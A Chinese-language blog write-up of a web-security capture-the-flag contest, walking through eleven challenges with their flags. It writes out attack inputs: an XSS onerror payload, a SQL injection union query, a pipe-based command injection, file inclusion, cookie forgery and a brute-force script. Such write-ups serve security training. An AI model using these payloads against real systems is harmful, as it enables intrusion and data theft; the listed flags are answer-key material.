标签:
没技术含量的wp,我就不写了……
一、简单问答
一开始的时候还是看见有不少人评论这道题,不过就是点多了点,注意一点就可以了
1、火狐firebug改几个值和标签
倒数五、六行
2、把题目答案写上
q1 2016 q2 lol q3 22 true
3、抓包改数据
4、提交得flag
flag{W3ll_d0n3}
二、后台后台后台
cookie中的member内容改为Admin经过b6加密后的值,因为现在的值是normal
三、php是最好的语言
四、忘记密码
1、点击几次页面后发现,密码都是名字+三位数字,写个脚本爆破下,就好了
<?php
for($a=100;$a<1000;$a++){
$b=‘slash‘.$a;
$c=md5($b);
$file=‘md5list.txt‘;
//file_put_contents ($file,$a."\r\n", FILE_APPEND);
file_put_contents ($file,$c."\r\n", FILE_APPEND);
}
?>
2、得到MD5值,经过burpsite的功能Intruder,爆破
load字典
点击start attack,开始爆破
看到624行,length不同,flag在这
flag{n1ce_te4m_n1ce_Rock}
五、简单的js
1、源码,看到有一段 js
2、解析后为<iframe height=0 width=0 src="./fl0a.php">
3、当前fl0a.php,显示$flag
4、cookie中有$flag C00k1els60SecU5e
六、php是门松散的预言
看到源码,意思为parse_str,把查询的字符串解析到变量中
构造payload ?hetian=he=abcd
七、XSS
onerror报错,弹窗
x‘ onerror=alert(document.domain)
flag D0Gum6Ntd0M11n
八、简单的文件包含
1、http://218.76.35.75:20126/index.php?page=/flag
2、源码 <!-- flag: 62a72cb2f3d5e7fc0284da9f21e66c9f.php-->
九、简单的验证
这个和第五个一样是跑脚本的
大致是100-999的三位数,把999当做变量爆破。别忘了把user改为admin
十、注入那么简单
1、测试
键入guest,测试有没有sql注入,单引号测试,闭合查询语句。
?name=guset’ --+
2、查有几个表
order by 4 报错,有三个表
3.找flag
题目提示猜表,发现information_schema被过滤,只能猜表,1,2,3都能当做显示位,
构造payload: ?name=guest‘ union select flag,2,3 from flag--+
十一、好简单的题目
1.回想这个题目确实在iscc中做过,这个还是做出来了
挺简单的键入127.0.0.1|ls,执行管道符后面的命令,只是iscc的是dir,这个题目说是dir溢出,确实有点坑,出现目录,访问得到flag
后面的题目由于某些原因没做,就这样吧^O^
标签:
原文地址:http://www.cnblogs.com/dropsaxing/p/5724918.html